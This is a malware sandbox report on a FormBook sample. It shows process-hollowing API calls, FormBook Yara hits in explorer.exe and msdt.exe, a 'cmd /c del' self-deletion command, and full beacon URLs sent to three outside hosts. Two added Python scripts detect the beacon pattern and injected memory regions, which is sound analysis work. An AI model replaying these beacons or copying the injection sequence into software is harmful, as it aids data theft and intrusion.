38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
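
The three requests in sessions 4 to 6 share one URI path (/u4an/) and one query parameter value (a8a=O6e4vnipWHrd6Lz) across three unrelated hosts, carry no User-Agent header, and close the connection after a single GET; the signature list at the top of the report flags the missing User-Agent. The other parameter changes per request and the two parameters swap order between the first request and the later ones. The Python below is an added example of detecting that pattern in captured traffic; it is not part of the Joe Sandbox report. The request text is constructed from the session data above, and treating the seven 0x00 bytes shown after each request's headers as the request body is an assumption about what the capture shows.

```python
"""Flag the beacon pattern shared by sessions 4, 5 and 6.

Added example, not part of the Joe Sandbox report. The requests are rebuilt
from the session data as raw HTTP text. The detector keys on what they share:
the same URI path on unrelated hosts, a query parameter whose value is identical
in every request regardless of parameter order, and no User-Agent header.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# The "00 00 00 00 00 00 00" bytes captured after the headers, assumed to be the body.
NULL_TAIL = "\x00" * 7

# Constructed from the request lines of sessions 4, 5 and 6.
RAW_REQUESTS = [
    "GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1\r\n"
    "Host: www.theseattlenotary.com\r\nConnection: close\r\n\r\n" + NULL_TAIL,
    "GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1\r\n"
    "Host: www.petersonmovingco.com\r\nConnection: close\r\n\r\n" + NULL_TAIL,
    "GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1\r\n"
    "Host: www.quinnwebster.top\r\nConnection: close\r\n\r\n" + NULL_TAIL,
]


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.1 request into method, host, path, query pairs, headers and body.

    The query is split by hand instead of with urllib.parse.parse_qs, which would decode
    the '+' inside the base64-looking values to a space and break byte-exact comparison.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    query = []
    for pair in (url.query.split("&") if url.query else []):
        key, _, value = pair.partition("=")
        query.append((key, value))
    return {"method": method, "host": headers.get("host", ""), "path": url.path,
            "query": query, "headers": headers, "body": body}


def request_flags(req: dict) -> list:
    """Per-request oddities a proxy or IDS rule would key on, in a fixed order."""
    flags = []
    if "user-agent" not in req["headers"]:
        flags.append("no_user_agent")
    if req["headers"].get("connection", "").lower() == "close":
        flags.append("connection_close")
    if req["method"] == "GET" and req["body"]:
        flags.append("get_with_body")
    return flags


def find_shared_beacons(raw_requests: list, min_hosts: int = 2) -> list:
    """Clusters of requests that reuse the same path and the same query key=value on at
    least `min_hosts` distinct Host headers. Query order is ignored on purpose: in the
    traffic above the two parameters swap places between the first and later requests."""
    parsed = [parse_request(r) for r in raw_requests]
    hosts_by_key = defaultdict(set)  # (path, key, value) -> {host}
    for req in parsed:
        for key, value in req["query"]:
            hosts_by_key[(req["path"], key, value)].add(req["host"])
    clusters = []
    for (path, key, value), hosts in hosts_by_key.items():
        if len(hosts) < min_hosts:
            continue
        members = [r for r in parsed if r["path"] == path and (key, value) in r["query"]]
        clusters.append({
            "path": path,
            "shared_param": f"{key}={value}",
            "hosts": sorted(hosts),
            "requests": len(members),
            "all_without_user_agent": all("no_user_agent" in request_flags(r) for r in members),
        })
    return clusters


if __name__ == "__main__":
    for cluster in find_shared_beacons(RAW_REQUESTS):
        print(cluster)
```

The responses in these sessions are ordinary pages (a 301 to the same URL, a Google-hosted business site returning 200, a 404 with a loader page), so status codes and response bodies on their own do not separate the beacon from normal browsing; the path and token repeated across unrelated domains from a process that never sets a User-Agent do.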


Code Manipulations

Statistics

CPU Usage, Memory Usage, High Level Behavior Distribution and Behavior: per-process charts in the interactive report, not reproduced in this text.

                                                                  System Behavior

                                                                  General

                                                                  Start time:17:31:14
                                                                  Start date:27/09/2021
                                                                  Path:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\ejecutable1.exe'
                                                                  Imagebase:0xf50000
                                                                  File size:840192 bytes
                                                                  MD5 hash:FF2724DDF0EF0525E9E419DB5199E96F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:31:18
                                                                  Start date:27/09/2021
                                                                  Path:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Imagebase:0xf50000
                                                                  File size:840192 bytes
                                                                  MD5 hash:FF2724DDF0EF0525E9E419DB5199E96F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:31:19
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0xffa10000
                                                                  File size:3229696 bytes
                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high
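
The FormBook hits in explorer.exe above sit at 0x7F73000, far below its image base of 0xffa10000, and the second ejecutable1.exe instance has hits at 0x80000, 0x360000 and 0x400000, all below its base of 0xf50000: code that is not part of the host image, which matches the process hollowing and injection the report flags. The Python below is an added triage example, not part of the report, that makes that comparison mechanically over the process blocks above and the msdt.exe block that follows. It assumes a reading of the dotted Source identifier that this page does not document: the first field is the sandbox's process number, the fourth the base address of the dumped region, the fifth the Win32 page protection of that region (0x40 is PAGE_EXECUTE_READWRITE).

```python
"""Relate each Yara hit to the image base of the process it was found in.

Added example, not part of the Joe Sandbox report. Assumption (inferred from the
values shown, not documented on the page): in a Source identifier such as
00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp the first
field is the process number, the fourth the region base, the fifth the page
protection.
"""

PAGE_EXECUTE_READWRITE = 0x40  # Win32 page-protection constant

# Constructed from the process blocks: image base as listed, (rule, Source) per Yara match.
PROCESSES = [
    {"index": 0, "path": r"C:\Users\user\Desktop\ejecutable1.exe", "imagebase": 0xF50000,
     "yara": [("JoeSecurity_AntiVM_3", "00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp"),
              ("JoeSecurity_FormBook", "00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp")]},
    {"index": 2, "path": r"C:\Users\user\Desktop\ejecutable1.exe", "imagebase": 0xF50000,
     "yara": [("JoeSecurity_FormBook", "00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp"),
              ("JoeSecurity_FormBook", "00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp"),
              ("JoeSecurity_FormBook", "00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp")]},
    {"index": 3, "path": r"C:\Windows\explorer.exe", "imagebase": 0xFFA10000,
     "yara": [("JoeSecurity_FormBook", "00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp"),
              ("JoeSecurity_FormBook", "00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp")]},
    {"index": 4, "path": r"C:\Windows\SysWOW64\msdt.exe", "imagebase": 0xBE0000,
     "yara": [("JoeSecurity_FormBook", "00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp"),
              ("JoeSecurity_FormBook", "00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp"),
              ("JoeSecurity_FormBook", "00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp")]},
]


def parse_source(source: str) -> dict:
    """Split a Source identifier into the fields this example relies on (assumed layout)."""
    if not source.endswith(".sdmp"):
        raise ValueError(f"unexpected source name: {source}")
    fields = source[:-len(".sdmp")].split(".")
    if len(fields) != 6:
        raise ValueError(f"expected 6 dotted fields, got {len(fields)}: {source}")
    return {"process": int(fields[0]),
            "region_base": int(fields[3], 16),
            "protection": int(fields[4], 16)}


def triage_hits(processes: list) -> list:
    """One finding per Yara match.

    A region whose base lies below the image base cannot belong to the process's own
    image, so it is marked outside_image. The report does not list SizeOfImage, so a
    region above the base is left undecided (outside_image False) rather than guessed.
    rwx marks regions dumped as PAGE_EXECUTE_READWRITE, which a normally mapped image
    section is not.
    """
    findings = []
    for proc in processes:
        for rule, source in proc["yara"]:
            region = parse_source(source)
            if region["process"] != proc["index"]:
                raise ValueError(f"{source} is not a dump of process {proc['index']}")
            findings.append({
                "process_index": proc["index"],
                "process_path": proc["path"],
                "rule": rule,
                "region_base": region["region_base"],
                "outside_image": region["region_base"] < proc["imagebase"],
                "rwx": region["protection"] == PAGE_EXECUTE_READWRITE,
            })
    return findings


def injected_code_regions(processes: list) -> dict:
    """Process path -> sorted distinct region bases with a FormBook hit that are both
    outside the process image and RWX: the candidates for injected code."""
    result = {}
    for f in triage_hits(processes):
        if f["rule"].endswith("FormBook") and f["outside_image"] and f["rwx"]:
            result.setdefault(f["process_path"], set()).add(f["region_base"])
    return {path: sorted(bases) for path, bases in result.items()}


if __name__ == "__main__":
    for path, bases in injected_code_regions(PROCESSES).items():
        print(path, ", ".join(hex(b) for b in bases))
```

Under these assumptions the first ejecutable1.exe instance yields no injected-code candidates: its two hits lie above the image base in regions the identifier marks 0x04 (PAGE_READWRITE), as expected for a .NET stage that holds the decoded payload in data memory before injecting it. The second instance, explorer.exe and msdt.exe all carry FormBook hits in RWX memory below their image base.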

                                                                  General

                                                                  Start time:17:31:32
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                  Imagebase:0xbe0000
                                                                  File size:983040 bytes
                                                                  MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:17:31:36
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\ejecutable1.exe'
                                                                  Imagebase:0x4a890000
                                                                  File size:302592 bytes
                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                    Execution Graph

                                                                    Execution Coverage:10.3%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:95
                                                                    Total number of Limit Nodes:1

                                                                    Graph

                                                                    execution_graph 9789 da8aae 9793 da8bcc 9789->9793 9797 da8c58 9789->9797 9790 da8ac0 9794 da8c72 9793->9794 9801 da8ca8 9794->9801 9798 da8c72 9797->9798 9800 da8ca8 12 API calls 9798->9800 9799 da8ca0 9799->9790 9800->9799 9802 da8cd5 9801->9802 9805 da8ff8 9802->9805 9806 da9012 9805->9806 9816 da95ba 9806->9816 9823 da98c7 9806->9823 9828 da9880 9806->9828 9832 da914c 9806->9832 9836 da995e 9806->9836 9840 da9d19 9806->9840 9845 da977b 9806->9845 9849 da9abb 9806->9849 9807 da8ca0 9807->9790 9817 da95c4 9816->9817 9854 daa680 9817->9854 9818 da95f3 9819 da91b7 9818->9819 9859 daa458 9818->9859 9864 daa468 9818->9864 9819->9807 9824 da98cd 9823->9824 9825 da91b7 9824->9825 9885 da7b68 9824->9885 9889 da7b60 9824->9889 9825->9807 9893 daa610 9828->9893 9898 daa600 9828->9898 9829 da9898 9911 da7fe8 9832->9911 9916 da7ff0 9832->9916 9838 da7b68 WriteProcessMemory 9836->9838 9839 da7b60 WriteProcessMemory 9836->9839 9837 da91b7 9838->9837 9839->9837 9841 da9d28 9840->9841 9842 da91b7 9841->9842 9843 da7b68 WriteProcessMemory 9841->9843 9844 da7b60 WriteProcessMemory 9841->9844 9842->9807 9843->9842 9844->9842 9920 da7d18 9845->9920 9924 da7d14 9845->9924 9846 da933a 9846->9807 9850 da9ac1 9849->9850 9851 da91b7 9850->9851 9852 da7b68 WriteProcessMemory 9850->9852 9853 da7b60 WriteProcessMemory 9850->9853 9852->9851 9853->9851 9855 daa69a 9854->9855 9869 da763b 9855->9869 9873 da7640 9855->9873 9856 daa6c9 9856->9818 9860 daa482 9859->9860 9877 da79eb 9860->9877 9881 da79f0 9860->9881 9861 daa4bd 9861->9819 9865 daa482 9864->9865 9867 da79eb VirtualAllocEx 9865->9867 9868 da79f0 VirtualAllocEx 9865->9868 9866 daa4bd 9866->9819 9867->9866 9868->9866 9870 da7684 ResumeThread 9869->9870 9872 da76d6 9870->9872 9872->9856 9874 da7684 ResumeThread 9873->9874 9876 da76d6 9874->9876 9876->9856 9878 da79f0 VirtualAllocEx 9877->9878 9880 da7a9f 9878->9880 9880->9861 9882 da7a34 VirtualAllocEx 9881->9882 9884 da7a9f 9882->9884 9884->9861 9886 da7bb4 WriteProcessMemory 9885->9886 9888 da7c53 9886->9888 9888->9825 9890 da7bb4 WriteProcessMemory 9889->9890 9892 da7c53 9890->9892 9892->9825 9894 daa62a 9893->9894 9903 da7778 9894->9903 9907 da7780 9894->9907 9895 daa65c 9895->9829 9899 daa62a 9898->9899 9901 da7778 Wow64SetThreadContext 9899->9901 9902 da7780 Wow64SetThreadContext 9899->9902 9900 daa65c 9900->9829 9901->9900 9902->9900 9904 da77c9 Wow64SetThreadContext 9903->9904 9906 da7847 9904->9906 9906->9895 9908 da77c9 Wow64SetThreadContext 9907->9908 9910 da7847 9908->9910 9910->9895 9912 da7f77 9911->9912 9913 da7feb CreateProcessA 9911->9913 9915 da82d5 9913->9915 9917 da8077 CreateProcessA 9916->9917 9919 da82d5 9917->9919 9919->9919 9921 da7d64 ReadProcessMemory 9920->9921 9923 da7de2 9921->9923 9923->9846 9925 da7d18 ReadProcessMemory 9924->9925 9927 da7de2 9925->9927 9927->9846

                                                                    Executed Functions

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 135 2700f0-270553 138 270555 135->138 139 27055a-270896 call 275a5a call 2703d8 call 2703e8 135->139 138->139 197 27089b-272a2a call 2703f8 call 270408 call 270418 call 270428 139->197 530 272a54 197->530 531 272a2c-272a38 197->531 534 272a5a-272b61 530->534 532 272a42-272a48 531->532 533 272a3a-272a40 531->533 535 272a52 532->535 533->535 544 272b63-272b6f 534->544 545 272b8b 534->545 535->534 546 272b71-272b77 544->546 547 272b79-272b7f 544->547 548 272b91-272c98 545->548 549 272b89 546->549 547->549 558 272cc2 548->558 559 272c9a-272ca6 548->559 549->548 562 272cc8-272dcf 558->562 560 272cb0-272cb6 559->560 561 272ca8-272cae 559->561 563 272cc0 560->563 561->563 572 272dd1-272ddd 562->572 573 272df9 562->573 563->562 575 272de7-272ded 572->575 576 272ddf-272de5 572->576 574 272dff-272f06 573->574 586 272f30 574->586 587 272f08-272f14 574->587 577 272df7 575->577 576->577 577->574 590 272f36-27303d 586->590 588 272f16-272f1c 587->588 589 272f1e-272f24 587->589 591 272f2e 588->591 589->591 600 273067 590->600 601 27303f-27304b 590->601 591->590 602 27306d-273174 600->602 603 273055-27305b 601->603 604 27304d-273053 601->604 614 273176-273182 602->614 615 27319e 602->615 605 273065 603->605 604->605 605->602 616 273184-27318a 614->616 617 27318c-273192 614->617 618 2731a4-2758c9 615->618 619 27319c 616->619 617->619 954 2758f3 618->954 955 2758cb-2758d7 618->955 619->618 958 2758f9-275a4d 954->958 956 2758e1-2758e7 955->956 957 2758d9-2758df 955->957 959 2758f1 956->959 957->959 959->958
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 26df6e99cf423451d369bee253383786f3ba87ff98cbd11c8f7233e367f0ecec
                                                                    • Instruction ID: 72f117f00034fc707f6a0afc7ce3a0b770329f067f6069ea5da24bc73ca9f779
                                                                    • Opcode Fuzzy Hash: 26df6e99cf423451d369bee253383786f3ba87ff98cbd11c8f7233e367f0ecec
                                                                    • Instruction Fuzzy Hash: 87C3B374A112598FC724DB64C894ED9B3B2FF8A304F5186E9D809AB361DB71AEC1CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e5ed4659a442b46664156ade60e80f186e65c7ee15aa66651017a8cc3fc43eb
                                                                    • Instruction ID: c1f6914d61266db7d993220074d498c3dac52ea8684b3ab0ab1f26cd54aecff8
                                                                    • Opcode Fuzzy Hash: 7e5ed4659a442b46664156ade60e80f186e65c7ee15aa66651017a8cc3fc43eb
                                                                    • Instruction Fuzzy Hash: E1B10574E00209CFDB00CFA9C9446AEBBF6AF8A304F28C46AD459AB355E734D941CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 44d3754ce620d778c8f488761838f703b669f5694f0ca22a9ecb686025cf807d
                                                                    • Instruction ID: 141183aaa8085442b80fb1bd57b55053b453c27c2880d6623f59c3101c76aff5
                                                                    • Opcode Fuzzy Hash: 44d3754ce620d778c8f488761838f703b669f5694f0ca22a9ecb686025cf807d
                                                                    • Instruction Fuzzy Hash: 6291F1B4D10619CFDB25CFA5C8487AEBBB2FF89304F14C0AAD409A7241DB745A95DF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fdd769311fd132266cb428251be4a5788e90cf58b8f655ab5fd3967f1f37a735
                                                                    • Instruction ID: d40382cb55c8eb7fe84d5b22032f525d9770b43a485b491eb541500ca545f842
                                                                    • Opcode Fuzzy Hash: fdd769311fd132266cb428251be4a5788e90cf58b8f655ab5fd3967f1f37a735
                                                                    • Instruction Fuzzy Hash: 9871E2B4E206198FCB04CFA9D488AAEFBF2BF49300F24C52AD419AB245D7749995CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 da7fe8-da7fe9 1 da7feb-da8089 0->1 2 da7f77-da7f8c 0->2 5 da808b-da80a2 1->5 6 da80d2-da80fa 1->6 5->6 9 da80a4-da80a9 5->9 10 da80fc-da8110 6->10 11 da8140-da8196 6->11 12 da80ab-da80b5 9->12 13 da80cc-da80cf 9->13 10->11 18 da8112-da8117 10->18 20 da8198-da81ac 11->20 21 da81dc-da82d3 CreateProcessA 11->21 14 da80b9-da80c8 12->14 15 da80b7 12->15 13->6 14->14 19 da80ca 14->19 15->14 22 da813a-da813d 18->22 23 da8119-da8123 18->23 19->13 20->21 29 da81ae-da81b3 20->29 39 da82dc-da83a1 21->39 40 da82d5-da82db 21->40 22->11 24 da8127-da8136 23->24 25 da8125 23->25 24->24 28 da8138 24->28 25->24 28->22 31 da81d6-da81d9 29->31 32 da81b5-da81bf 29->32 31->21 33 da81c3-da81d2 32->33 34 da81c1 32->34 33->33 35 da81d4 33->35 34->33 35->31 51 da83bd-da83be 39->51 40->39 52 da8398-da83a1 51->52 53 da83c0-da83c1 51->53 52->51 54 da83c3-da83c7 53->54 55 da83d1-da83d5 53->55 54->55 56 da83c9 54->56 57 da83d7-da83db 55->57 58 da83e5-da83e9 55->58 56->55 57->58 59 da83dd 57->59 60 da83eb-da83ef 58->60 61 da83f9-da83fd 58->61 59->58 60->61 62 da83f1 60->62 63 da83ff-da8428 61->63 64 da8433-da843e 61->64 62->61 63->64 68 da843f 64->68 68->68
                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DA82B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: <mw$<mw$<mw
                                                                    • API String ID: 963392458-139993042
                                                                    • Opcode ID: b968376d9550deed03627bd3a32709ab3d9c189aece3d193c48898f757327972
                                                                    • Instruction ID: 1716face248840ae2aa45dd15dc02309780e4cea1a75920f087e48485c514a96
                                                                    • Opcode Fuzzy Hash: b968376d9550deed03627bd3a32709ab3d9c189aece3d193c48898f757327972
                                                                    • Instruction Fuzzy Hash: BED1F271D002198FDF20CFA4C841BEEBBB1BB4A304F1495AAD859A7240DB749A85DF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
